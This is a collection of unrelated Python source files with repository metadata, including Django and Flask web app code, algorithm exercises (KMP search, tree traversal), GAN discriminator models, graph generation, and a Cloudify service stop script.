sns.set(style="whitegrid")
stocklist=[]
with open('nsdqlist') as f:
for i in f.readlines():
stocklist.append(i.replace("\n", ""))
print stocklist
if __name__ == "__main__":
with open('/var/www/html/nsdq.html', 'w') as file:
file.write('<html> \n')
file.write(' <head> \n')
file.write(' <title> NYSE Stock Data</title> \n')
file.write(' </head> \n')
file.write(' <body> \n')
for i in stocklist:
file.write(' <H1> ' + i + ' </H1> \n')
file.write(" <img alt='no image1' src='" + i + ".png'></img> \n")
file.write(' </body> \n')
file.write('<html> \n')
while(1):
data1 = bt.get_stock_data(bt.get_data(365), bt.get_data(0), *stocklist)
for i in stocklist:
try:
data1[i].plot(subplots=False, figsize=(10, 4))
str1="/var/www/html/"+i+".png"
plt.savefig(str1)
plt.clf()
plt.cla()
plt.close()
except:
plt.clf()
plt.cla()
plt.close()
time.sleep(86400)
|
[
"owenyang15@gmail.com"
] |
owenyang15@gmail.com
|
fd9e511e51c72e0a1353b2c0bc7ae8c41207336b
|
5593282e0e1b2e3c1f19e06a6d9d8ee66bb06544
|
/learning_site/courses/urls.py
|
68a571a60615678420982dcf8c5543661e9037de
|
[] |
no_license
|
aliglaser/django_basics
|
e9921c7adbe7107feb8d6776b78eeed565758768
|
72afc874724517eab7aa08902600da377d0acd6e
|
refs/heads/master
| 2020-03-20T20:05:24.338912
| 2018-06-17T16:32:34
| 2018-06-17T16:32:34
| 137,669,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 342
|
py
|
from django.contrib import admin
from django.urls import path
from django.conf.urls import url
from . import views
app_name = "courses"
urlpatterns = [
path('', views.course_list, name="course_list"),
path('<course_pk>/<step_pk>/', views.step_detail, name="step_detail"),
path('<int:pk>/', views.course_detail, name="course_detail"),
]
|
[
"nurinuriprettynuri@gmail.com"
] |
nurinuriprettynuri@gmail.com
|
3b181b6db3bb75bc674258d94064ebebd1809799
|
4c435f68c026b578f4564cc321353bb3d7ec1685
|
/day7-字符串和常用的数据结构/exam/double_ball.py
|
ca48de308d2dd3833f45d47efd1cfd434fde0bad
|
[] |
no_license
|
Keekuun/my-pthon-100
|
a8a0e4fdd1f5264aadcf7302779ecbb968378481
|
ca3a703966f2c2d06761d960839d9ffecc9108f3
|
refs/heads/master
| 2020-05-18T23:59:37.153200
| 2019-06-02T08:48:58
| 2019-06-02T08:48:58
| 184,725,421
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 810
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
created on 2019/5/5
@user: Keekuun
功能描述:
双色球选号
"""
from random import randrange, randint, sample
def display(balls):
"""
输出列表中的双色球号码
"""
for index, ball in enumerate(balls):
if index == len(balls) - 1:
print('|', end=' ')
print('%02d' % ball, end=' ')
print()
def random_select():
"""
随机选择一组号码
"""
red_balls = [x for x in range(1, 34)]
# 取样
selected_balls = sample(red_balls, 6)
selected_balls.sort()
selected_balls.append(randint(1, 16))
return selected_balls
def main():
n = int(input('机选几注: '))
for _ in range(n):
display(random_select())
if __name__ == '__main__':
main()
|
[
"1315815604@qq.com"
] |
1315815604@qq.com
|
d1e8f367dd86118abe6879d5f86109637b40400a
|
3b36a274dc6b6aa4417fc6d859436d5f50f208b7
|
/KMP.py
|
3b82377f2029ab61c092e42a95ed8f8d7ceaddb9
|
[] |
no_license
|
saife245/ALGORITHM-AND-DATA-STRUCTURE
|
66baca2ba63d3b2cffcdafc19cd82913d18f47be
|
cd7145beaf0973463805abff5c498b98e2e88c80
|
refs/heads/master
| 2020-03-28T06:16:26.058603
| 2018-11-17T18:26:15
| 2018-11-17T18:26:15
| 147,824,324
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 891
|
py
|
def KMP(pattern, string):
m = len(pattern)
n = len(string)
s = [0]*(n)
j = 0
calc_next(pattern, m, s)
i = 0
while i < n:
if pattern[j] == string[i]:
i += 1
j += 1
if j == m:
print ("Found at " + str(i-j))
j = s[j-1]
elif i < n and pattern[j] != string[i]:
if j != 0:
j = s[j-1]
else:
i += 1
def calc_next(pattern, n, s):
l = 0
s[0]
i = 1
while i < n:
if pattern[i]== pattern[l]:
l += 1
s[i] = l
i += 1
else:
if l != 0:
l = s[l-1]
else:
s[i] = 0
i += 1
string = "banananobano"
pattern = "nano"
KMP(pattern, string)
|
[
"noreply@github.com"
] |
noreply@github.com
|
ac9cbff6616993fe2ea2f872485ef2cd05863776
|
419873dd3b7412f704b1a7907b64a60b44cedf39
|
/python/树/1448. 统计二叉树中好节点的数目.py
|
00d74027dba7eea0cc91e63759b58e33a3e74545
|
[] |
no_license
|
Weless/leetcode
|
0585c5bfa260713f44dabc51fa58ebf8a10e7814
|
0566622daa5849f7deb0cfdc6de2282fb3127f4c
|
refs/heads/master
| 2021-11-13T07:59:20.299920
| 2021-10-25T02:09:53
| 2021-10-25T02:09:53
| 203,720,668
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,627
|
py
|
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def goodNodes(self, root: TreeNode) -> int:
if not root:
return 0
from collections import deque
queue = deque()
queue.appendleft((root.val,root))
count = 1
while queue:
nodeVal,node = queue.pop()
if node.left:
if node.left.val >= nodeVal:
queue.appendleft((node.left.val,node.left))
count+=1
else:
queue.appendleft((nodeVal,node.left))
if node.right:
if node.right.val >= nodeVal:
queue.appendleft((node.right.val,node.right))
count+=1
else:
queue.appendleft((nodeVal,node.right))
return count
class Solution:
def goodNodes(self, root: TreeNode) -> int:
if not root:
return 0
self.res = 0
def dfs(root,val):
if not root:
return
if root.left:
if root.left.val >= val:
self.res +=1
dfs(root.left,root.left.val)
else:
dfs(root.left,val)
if root.right:
if root.right.val >= val:
self.res +=1
dfs(root.right,root.right.val)
else:
dfs(root.right,val)
dfs(root,root.val)
return self.res
|
[
"twzcxx1@163.com"
] |
twzcxx1@163.com
|
1e0b285cb8ac7fcbc73604eb8496ee2d461f6df6
|
9397cd77704723787d6646152d9829ad2ed7057c
|
/scripts/codeserver/stop.py
|
949aaabc931391e562773c3fbfeeeb42f6837713
|
[
"Apache-2.0"
] |
permissive
|
cloudify-examples/cloudify-rolling-upgrade
|
028f5f4021c26ed3790c0be9ce3351ebb5e1bb24
|
b2edc632f3ee5b4cf2fd2ee018ac814cfaed6c6b
|
refs/heads/master
| 2021-01-17T10:22:59.410566
| 2016-10-20T10:34:34
| 2016-10-20T10:34:34
| 57,342,216
| 2
| 2
| null | 2016-10-20T10:34:34
| 2016-04-29T00:17:34
|
Python
|
UTF-8
|
Python
| false
| false
| 531
|
py
|
#
# Start process that serves code to rolling upgrade process. In a
# "real" system, this would be external to this blueprint
#
import time
import sys
import os
import subprocess
import traceback
from cloudify import ctx
from cloudify.state import ctx_parameters as p
def stop():
ctx.logger.info("stopping codeserver")
# create directory for serving code and load it up
pid=ctx.instance.runtime_properties['pid']
os.system("kill {}".format(pid))
os.system("rm -rf /tmp/code")
ctx.logger.info("stop complete")
stop()
|
[
"dewayne@gigaspaces.com"
] |
dewayne@gigaspaces.com
|
17371c0c05eb0a54d12cfae1089ffbf4af13250e
|
0a2167a58687db61423fa71dc3982194c8dbf3a4
|
/photo_upload_js/search/urls.py
|
57e7e59472bb8529fa18d1bbca7daf94b1e18388
|
[] |
no_license
|
nilldiggonto/js_with_django3
|
e6728192bc45313b43fc8c1696207ee0eb990445
|
ec8df007732ada06aba8956460a2ecb0d5f20b27
|
refs/heads/main
| 2023-03-13T18:17:13.465079
| 2021-03-01T12:43:40
| 2021-03-01T12:43:40
| 338,062,634
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 213
|
py
|
from django.urls import path
from .views import SearchListView,post_with_photo_view
urlpatterns = [
path('',SearchListView.as_view(),name='search-list'),
path('up/',post_with_photo_view,name='up-post'),
]
|
[
"nilldiggonto@gmail.com"
] |
nilldiggonto@gmail.com
|
726b58567c2d9b96312f1a2247fda43614f50976
|
1eedb7439266cc63df179aac8fae28cdcf83b3d5
|
/nuwe_data_viewer/plugin/project_explorer/model/container_node.py
|
311b62d82ec1eb6b6954727a6b4e65bfa9ca2073
|
[] |
no_license
|
perillaroc/nuwe-data-viewer
|
6f11d19de920bbe2c9937ee4c3169cbe20dfafcc
|
12a49844980946f07523f87786b054aa6d9c2e10
|
refs/heads/master
| 2020-03-27T04:59:41.085059
| 2019-05-11T14:24:44
| 2019-05-11T14:24:44
| 145,986,751
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 220
|
py
|
# coding: utf-8
from nuwe_data_viewer.plugin.project_explorer.model.node import Node
class ContainerNode(Node):
def __init__(self, display_name="", node_id=None):
Node.__init__(self, display_name, node_id)
|
[
"perillaroc@gmail.com"
] |
perillaroc@gmail.com
|
f09d106fdba174b4d50bd24e47c76d79bcff3de6
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/galex_j16155+5048/sdB_galex_j16155+5048_coadd.py
|
910403f482b6eda6d8e12bdf3a0cae2ad2051389
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 453
|
py
|
from gPhoton.gMap import gMap
def main():
gMap(band="NUV", skypos=[243.88925,50.807131], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_galex_j16155+5048/sdB_galex_j16155+5048_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_galex_j16155+5048/sdB_galex_j16155+5048_count_coadd.fits", overwrite=True, verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
c30195e20830c6a9fff035c49fb0fb984e4a74c3
|
1be9a0eb0d5a359f6602e940e251cb5f926c5d3b
|
/accounts/urls.py
|
ff35917108298c8f30d271239109626d80048147
|
[] |
no_license
|
Ashish138200/SocialMC
|
5d6420eb3d6102b3c5916407b8316fdcc8a2d4c8
|
a945ab99d0a34d68994ad6946e40b0712a2ca510
|
refs/heads/master
| 2023-07-15T07:18:28.352298
| 2021-08-26T10:36:37
| 2021-08-26T10:36:37
| 288,792,754
| 0
| 1
| null | 2020-12-15T18:48:40
| 2020-08-19T17:18:07
|
Python
|
UTF-8
|
Python
| false
| false
| 501
|
py
|
from django.urls import path
from django.contrib.auth import views as auth_views
from . import views
app_name = 'accounts'
urlpatterns = [
path(r'login',auth_views.LoginView.as_view(template_name='accounts/login.html'),name='login'),
# Display the login form and handle the login action.
path(r'logout/$', auth_views.LogoutView.as_view(), name='logout'),
# Log out the user and display the 'You are logged out' message.
path(r'signup/$', views.SignUp.as_view(), name='signup'),
]
|
[
"ashish.chaurasia_ccv18@gla.ac.in"
] |
ashish.chaurasia_ccv18@gla.ac.in
|
f23afbc4e4161baef516abce0a35323d97d2e03e
|
afd9fcd9b15602167d8b09a7fcc32b2e6454c25b
|
/models/discriminator.py
|
e0d4fecf6eba078ebbcc89be9c94940e84070413
|
[] |
no_license
|
Andrewsher/cincgan
|
3bcecc0d140bc540b031651737f4cc8c7e996a68
|
a99c78881bef25459cf8d31ebd3605e11c9ed17a
|
refs/heads/master
| 2022-04-19T19:50:33.627938
| 2020-04-05T07:45:17
| 2020-04-05T07:45:17
| 221,356,193
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,813
|
py
|
from torch import nn
import torch.nn.functional as F
class Discriminator_lr(nn.Module):
def __init__(self, in_channels=1, in_h=16, in_w=16):
super(Discriminator_lr, self).__init__()
self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=64, kernel_size=3, padding=1)
self.conv2 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1)
self.bn1 = nn.BatchNorm2d(num_features=128)
self.conv3 = nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, padding=1)
self.bn2 = nn.BatchNorm2d(num_features=256)
self.conv4 = nn.Conv2d(in_channels=256, out_channels=512, kernel_size=3, padding=1)
self.bn3 = nn.BatchNorm2d(num_features=512)
self.conv5 = nn.Conv2d(in_channels=512, out_channels=1, kernel_size=3, padding=1)
self.linear1 = nn.Linear(in_features=1*in_h*in_w, out_features=1024)
self.linear2 = nn.Linear(in_features=1024, out_features=1)
def forward(self, x):
y = F.leaky_relu(self.conv1(x), inplace=True)
y = F.leaky_relu(self.bn1(self.conv2(y)), inplace=True)
y = F.leaky_relu(self.bn2(self.conv3(y)), inplace=True)
y = F.leaky_relu(self.bn3(self.conv4(y)), inplace=True)
y = F.leaky_relu(self.conv5(y), inplace=True)
# y = y.flatten(1, -1)
# y = nn.Linear(in_features=y.shape[-1], out_features=1024)
# y.shape[-1]
# y = F.relu(self.linear1(y.view(y.size(0), -1)), inplace=True)
y = F.leaky_relu(self.linear1(y.flatten(1, -1)), inplace=True)
y = F.sigmoid(self.linear2(y))
return y
class Discriminator_sr(nn.Module):
def __init__(self, in_channels=1, in_h=64, in_w=64):
super(Discriminator_sr, self).__init__()
self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=64, kernel_size=3, padding=1, stride=2)
self.conv2 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1, stride=2)
self.bn1 = nn.BatchNorm2d(num_features=128)
self.conv3 = nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, padding=1)
self.bn2 = nn.BatchNorm2d(num_features=256)
self.conv4 = nn.Conv2d(in_channels=256, out_channels=512, kernel_size=3, padding=1)
self.bn3 = nn.BatchNorm2d(num_features=512)
self.conv5 = nn.Conv2d(in_channels=512, out_channels=1, kernel_size=3, padding=1)
self.linear1 = nn.Linear(in_features=1*in_h*in_w//16, out_features=128)
self.linear2 = nn.Linear(in_features=128, out_features=1)
def forward(self, x):
y = F.leaky_relu(self.conv1(x), inplace=True)
y = F.leaky_relu(self.bn1(self.conv2(y)), inplace=True)
y = F.leaky_relu(self.bn2(self.conv3(y)), inplace=True)
y = F.leaky_relu(self.bn3(self.conv4(y)), inplace=True)
y = F.leaky_relu(self.conv5(y), inplace=True)
y = y.flatten(1, -1)
y = F.leaky_relu(self.linear1(y), inplace=True)
# y = nn.Linear(in_features=y.shape[-1], out_features=1024)
# y.shape[-1]
# y = F.relu(self.linear1(y.view(y.size(0), -1)), inplace=True)
y = F.sigmoid(self.linear2(y))
return y
if __name__ == '__main__':
model = Discriminator_sr()
print(model)
# for parameter in model.parameters():
# print(parameter)
print("# of parameter:", sum(param.numel() for param in model.parameters()))
import numpy as np
input_map = np.zeros((1, 64, 64))
# input_map = np.reshape(input_map, (1, 64, 64))
import torchvision, torch
# input_map = torchvision.transforms.functional.to_tensor(input_map)
input_maps = torch.as_tensor(data=[input_map, input_map, input_map, input_map], dtype=torch.float)
print(input_maps.shape)
output_map = model(input_maps)
print(output_map.shape)
|
[
"30388833+Andrewsher@users.noreply.github.com"
] |
30388833+Andrewsher@users.noreply.github.com
|
23776c548405a31bbc4586662ae2da0f5154d617
|
dd50e92d9d05f00d96aefd61e1422f1897397af1
|
/venv/Scripts/futurize-script.py
|
482848934b8f88ae0adfafc67a6dc8fcb065b8d9
|
[] |
no_license
|
zrxingchen/bwshop
|
ca60f55a948b64a07df4b31d6dc8b26bae0ceb4b
|
53d5bee96adf8b7fea8f560907555f2b4068b6ce
|
refs/heads/master
| 2022-07-29T21:19:49.183645
| 2020-05-23T07:54:15
| 2020-05-23T07:54:15
| 266,286,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
#!D:\BWshop\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','futurize'
__requires__ = 'future==0.18.2'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('future==0.18.2', 'console_scripts', 'futurize')()
)
|
[
"2425277916@qq.com"
] |
2425277916@qq.com
|
520f84d54ac2da80bd3c31865bc75383a40b08e6
|
77f9dc39ea7bbf904201ccfda9a806ce8c68605d
|
/hamiltonian_cycle/erdos_renyi_model_generation.py
|
fce71db43449b9c453ae3476eddd7a16fdb42fa8
|
[] |
no_license
|
TzuriR/Complex-Networks
|
c5787ab5be27d9c4356dd12e36deb5f0f11a8ac0
|
76cd862193e699799d87177a19b7cd792eaf7a52
|
refs/heads/main
| 2023-06-05T10:43:02.045696
| 2021-06-23T18:36:26
| 2021-06-23T18:36:26
| 308,382,110
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,428
|
py
|
import networkx as nx
import matplotlib.pyplot as plt
# Generate graph
def gen_graph(n, p):
g = nx.generators.random_graphs.erdos_renyi_graph(n, p)
print("g.nodes:", g.nodes)
print("g.edges:", g.edges)
nx.draw(g, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
'''
g.nodes:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
g.edges:
[(0, 1), (0, 2), (0, 5), (0, 7), (0, 8), (1, 3), (1, 5), (1, 6), (1, 8), (1, 9), (2, 3), (2, 4), (2, 5), (2, 6),
(2, 8), (3, 5), (3, 7), (3, 8), (3, 9), (4, 5), (4, 7), (5, 6), (5, 7), (5, 8), (6, 7), (6, 9), (7, 8)]
# Example: do cycle with rotation - 10
g = nx.Graph()
g.add_nodes_from([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
g.add_edge(0, 1)
g.add_edge(0, 2)
g.add_edge(0, 8)
g.add_edge(1, 4)
g.add_edge(1, 5)
g.add_edge(2, 4)
g.add_edge(2, 8)
g.add_edge(3, 4)
g.add_edge(3, 6)
g.add_edge(3, 7)
g.add_edge(3, 8)
g.add_edge(3, 9)
g.add_edge(4, 5)
g.add_edge(4, 7)
g.add_edge(4, 9)
g.add_edge(5, 8)
g.add_edge(5, 9)
g.add_edge(6, 7)
g.add_edge(6, 8)
g.add_edge(7, 8)
g.add_edge(7, 9)
nx.draw(G, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
#Example: do cycle without rotation - 6
g = nx.Graph()
g.add_nodes_from([0, 1, 2, 3, 4, 5])
g.add_edge(0, 1)
g.add_edge(0, 3)
g.add_edge(0, 5)
g.add_edge(1, 2)
g.add_edge(1, 3)
g.add_edge(1, 4)
g.add_edge(2, 4)
g.add_edge(4, 5)
nx.draw(G, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
#Example: do cycle without rotation - 10
g = nx.Graph()
g.add_nodes_from([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
g.add_edge(0, 4)
g.add_edge(0, 6)
g.add_edge(0, 7)
g.add_edge(0, 9)
g.add_edge(1, 2)
g.add_edge(1, 3)
g.add_edge(1, 5)
g.add_edge(1, 6)
g.add_edge(1, 7)
g.add_edge(2, 3)
g.add_edge(2, 5)
g.add_edge(2, 6)
g.add_edge(2, 7)
g.add_edge(3, 4)
g.add_edge(3, 5)
g.add_edge(3, 7)
g.add_edge(4, 6)
g.add_edge(4, 7)
g.add_edge(4, 8)
g.add_edge(5, 6)
g.add_edge(5, 7)
g.add_edge(6, 8)
g.add_edge(6, 9)
g.add_edge(8, 9)
nx.draw(G, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
return G
'''
return g
|
[
"noreply@github.com"
] |
noreply@github.com
|
fb3a5e9f5dce86eb789b96780d23bfa15143549e
|
f48b15249ffe83bb7aaa5c808fc133ee1e3779d1
|
/clustertracking/constraints.py
|
09859930c059bdc0ca95ba1ffb629dc83db8674a
|
[] |
no_license
|
caspervdw/clustertracking
|
15aff332c6524bad265637e547d8f40e563d8991
|
2a45f71ed84bd2c31b001a7ce2f25e58798659c6
|
refs/heads/master
| 2020-05-22T04:14:47.724621
| 2017-03-14T14:20:40
| 2017-03-14T14:20:40
| 64,404,511
| 0
| 0
| null | 2016-09-27T11:09:48
| 2016-07-28T14:57:36
|
Python
|
UTF-8
|
Python
| false
| false
| 6,727
|
py
|
from __future__ import division, print_function, absolute_import
import six
import numpy as np
from .utils import validate_tuple
from .fitfunc import vect_to_params
from warnings import warn
def _wrap_fun(func, params_const, modes, ids=None):
def wrapped(vect, *args, **kwargs):
params = vect_to_params(vect, params_const, modes, ids)
return func(params, *args, **kwargs)
return wrapped
def wrap_constraints(constraints, params_const, modes, groups=None):
if constraints is None:
return []
if groups is not None:
cl_sizes = np.array([len(params_const)], dtype=np.int)
result = []
for cons in constraints:
cluster_size = cons.get('cluster_size', None)
if cluster_size is None:
# provide all parameters to the constraint
def wrapped(vect, *args, **kwargs):
params = vect_to_params(vect, params_const, modes, groups)
return cons['fun'](params[np.newaxis, :, :], *args, **kwargs)
elif groups is None:
if len(params_const) != cluster_size:
continue
# provide all parameters to the constraint
def wrapped(vect, *args, **kwargs):
params = vect_to_params(vect, params_const, modes, groups)
return cons['fun'](params[np.newaxis, :, :], *args, **kwargs)
elif cluster_size in cl_sizes:
groups_this = groups[0][cl_sizes == cluster_size]
if len(groups_this) == 0:
continue
# group the appropriate clusters together and return multiple values
def wrapped(vect, *args, **kwargs):
params = vect_to_params(vect, params_const, modes, groups)
params_grouped = np.array([params[g] for g in groups_this])
return cons['fun'](params_grouped, *args, **kwargs)
else:
continue
cons_wrapped = cons.copy()
cons_wrapped['fun'] = wrapped
result.append(cons_wrapped)
if 'jac' in cons_wrapped:
warn('Constraint jacobians are not implemented')
del cons_wrapped['jac']
return result
def _dimer_fun(x, dist, ndim):
pos = x[..., 2:2+ndim] # get positions only
return 1 - np.sum(((pos[:, 0] - pos[:, 1])/dist)**2, axis=1)
# def _dimer_jac(x, dist, ndim):
# result = np.zeros_like(x)
# x = x[:, 2:2+ndim] # get positions only
# result[:, 2:2+ndim] = -2 * (x - x[[1, 0]])/dist[np.newaxis, :]**2
# return result
def dimer(dist, ndim=2):
"""Constrain clusters of 2 at given distance.
Allows image anisotropy by providing a tuple to as distance"""
dist = np.array(validate_tuple(dist, ndim))
return (dict(type='eq', cluster_size=2, fun=_dimer_fun, args=(dist, ndim)),)
def _trimer_fun(x, dist, ndim):
x = x[..., 2:2+ndim] # get positions only
return np.concatenate((1 - np.sum(((x[:, 0] - x[:, 1])/dist)**2, axis=1),
1 - np.sum(((x[:, 1] - x[:, 2])/dist)**2, axis=1),
1 - np.sum(((x[:, 0] - x[:, 2])/dist)**2, axis=1)))
# def _trimer_jac(x, dist, ndim, indices):
# result = np.zeros_like(x)
# x = x[:, -ndim:] # get positions only
# result[indices, -ndim:] = -2 * (x[indices] - x[indices[::-1]])/dist[np.newaxis, :]**2
# return result
def trimer(dist, ndim=2):
"""Constrain clusters of 3 at given distance.
Allows image anisotropy by providing a tuple to as distance.
Constraints all 3 distances to the same distance."""
dist = np.array(validate_tuple(dist, ndim))
return (dict(type='eq', cluster_size=3, fun=_trimer_fun, args=(dist, ndim)),)
def _tetramer_fun_2d(x, dist):
x = x[..., 2:4] # get positions only
dists = np.vstack((np.sum(((x[:, 0] - x[:, 1])/dist)**2, axis=1),
np.sum(((x[:, 1] - x[:, 2])/dist)**2, axis=1),
np.sum(((x[:, 0] - x[:, 2])/dist)**2, axis=1),
np.sum(((x[:, 1] - x[:, 3])/dist)**2, axis=1),
np.sum(((x[:, 0] - x[:, 3])/dist)**2, axis=1),
np.sum(((x[:, 2] - x[:, 3])/dist)**2, axis=1)))
# take the 4 smallest: they should be 1
# do not test the other 2: they are fixed by the 4 first constraints.
dists = np.sort(dists, axis=0)[:4]
return np.ravel(1 - dists)
def _tetramer_fun_3d(x, dist):
x = x[..., 2:5] # get positions only
return np.concatenate((1 - np.sum(((x[:, 0] - x[:, 1])/dist)**2, axis=1),
1 - np.sum(((x[:, 1] - x[:, 2])/dist)**2, axis=1),
1 - np.sum(((x[:, 0] - x[:, 2])/dist)**2, axis=1),
1 - np.sum(((x[:, 1] - x[:, 3])/dist)**2, axis=1),
1 - np.sum(((x[:, 0] - x[:, 3])/dist)**2, axis=1),
1 - np.sum(((x[:, 2] - x[:, 3])/dist)**2, axis=1)))
def tetramer(dist, ndim=2):
"""Constrain clusters of 4 at given distance.
For 2D: features are in a perfect square (4 constraints)
For 3D: features are constrained in a tetrahedron (6 constraints).
Allows image anisotropy by providing a tuple to as distance."""
dist = np.array(validate_tuple(dist, ndim))
if ndim == 2:
return (dict(type='eq', cluster_size=4, fun=_tetramer_fun_2d, args=(dist,)),)
elif ndim == 3:
return (dict(type='eq', cluster_size=4, fun=_tetramer_fun_3d, args=(dist,)),)
else:
raise NotImplementedError
def _dimer_fun_global(x, mpp, ndim):
if x.ndim == 2 or len(x) <= 1:
return []
pos = x[..., 2:2+ndim] # get positions only, shape (n_clusters, 2, ndim)
dist_squared = np.sum(((pos[:, 0] - pos[:, 1])*mpp)**2, axis=1)**2
return np.diff(dist_squared)
# def _dimer_jac_global(x, mpp, ndim):
# if x.ndim == 2 or len(x) <= 1:
# return []
# result = np.zeros((x.shape[0] - 1,) + x.shape)
# x = x[..., -ndim:] # get positions only, shape (n_clusters, 2, ndim)
# _jac = -2 * (x - x[:, [1, 0]]) * mpp**2
# # result[:, :-1, :, -ndim] = _jac
# # result[:, 1:, :, -ndim] = -1*_jac
#
# for i in range(x.shape[0] - 1):
# result[i, i, :, -ndim:] = _jac[i]
# result[i, i + 1, :, -ndim:] = -_jac[i + 1]
# return result
def dimer_global(mpp, ndim=2):
"""Constrain clusters of 2 to a constant, unknown distance.
Allows image anisotropy by providing ``mpp``, microns per pixel. The
number of constraints equals the number of frames - 1."""
# the jacobian seems to slow things down.
# in tests: 26 iterations without, 198 with
mpp = np.array(validate_tuple(mpp, ndim))
return (dict(type='eq', fun=_dimer_fun_global, args=(mpp, ndim,)),)
|
[
"caspervdw@gmail.com"
] |
caspervdw@gmail.com
|
111628150e762a86920296bd8ea444544424cdbd
|
f1c51fb8638dcf8876b376c7574f777956812f8a
|
/product/migrations/0002_auto_20170910_2136.py
|
a79959aa08bdc6963bb9188ccc79c34ef6ead83c
|
[] |
no_license
|
toshunster/mudhaa
|
1ca4cadd84b506588ef35bcf7dea643243cbf681
|
f2607ed314d8a57978dcb18365ae76858d62b745
|
refs/heads/master
| 2022-12-11T18:33:37.042636
| 2017-10-21T20:21:00
| 2017-10-21T20:21:00
| 103,202,463
| 0
| 0
| null | 2022-12-08T00:36:09
| 2017-09-12T00:32:59
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 3,286
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2017-09-10 21:36
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import vendor.items.fields
class Migration(migrations.Migration):
dependencies = [
('product', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Packing',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.CharField(max_length=23, verbose_name='Packing text')),
],
),
migrations.CreateModel(
name='TypeOrUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type_or_user', models.CharField(max_length=60)),
],
),
migrations.AddField(
model_name='product',
name='SKU',
field=models.CharField(default='default', max_length=60),
preserve_default=False,
),
migrations.AddField(
model_name='product',
name='country',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='product.Country'),
preserve_default=False,
),
migrations.AddField(
model_name='product',
name='manifacturere',
field=models.CharField(default='default', max_length=60),
preserve_default=False,
),
migrations.AddField(
model_name='product',
name='photo',
field=vendor.items.fields.ThumbnailImageField(blank=True, null=True, storage=vendor.items.fields.MyFileSystemStorage(), upload_to='products_photo/'),
),
migrations.AddField(
model_name='product',
name='retail_unit_price',
field=models.FloatField(default=0.0),
),
migrations.AddField(
model_name='product',
name='size_weight',
field=models.CharField(default='default', max_length=60),
preserve_default=False,
),
migrations.AddField(
model_name='product',
name='zero_gst',
field=models.BooleanField(default=True),
),
migrations.AlterField(
model_name='product',
name='description',
field=models.TextField(blank=True, null=True, verbose_name='Description (optional)'),
),
migrations.AlterField(
model_name='product',
name='name',
field=models.CharField(max_length=60, verbose_name='Name of the Product'),
),
migrations.AddField(
model_name='product',
name='packing',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='product.Packing'),
preserve_default=False,
),
migrations.AddField(
model_name='product',
name='type_or_user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='product.TypeOrUser'),
preserve_default=False,
),
]
|
[
"a.kukhtichev@mail.ru"
] |
a.kukhtichev@mail.ru
|
57809b70323bdda9468df6f71f4fb499da34d2fc
|
655396f38912107eb94cef5a20e2f5073ba9b380
|
/app/blueprints/shop/routes.py
|
54b75999ee221d0b2fc8941d0a1e8de8ce039add
|
[] |
no_license
|
btnewman7/PizzaBook
|
5b10656774ddf6740ec2dbf4cb460e79ae779958
|
0d5036666884d1d3ab5dab28030c79cd397a3979
|
refs/heads/master
| 2023-02-04T22:01:17.623014
| 2020-12-28T20:35:21
| 2020-12-28T20:35:21
| 325,065,118
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,287
|
py
|
from app import db
from .import bp as shop
from flask import render_template, redirect, url_for, request, flash, session, jsonify, current_app as app
from .models import Product, Category, Cart
from app.blueprints.authentication.models import User
from flask_login import login_required, current_user
from datetime import datetime as dt
@shop.route('/', methods=['GET'])
@login_required
def index():
context = {
'products': Product.query.all()
}
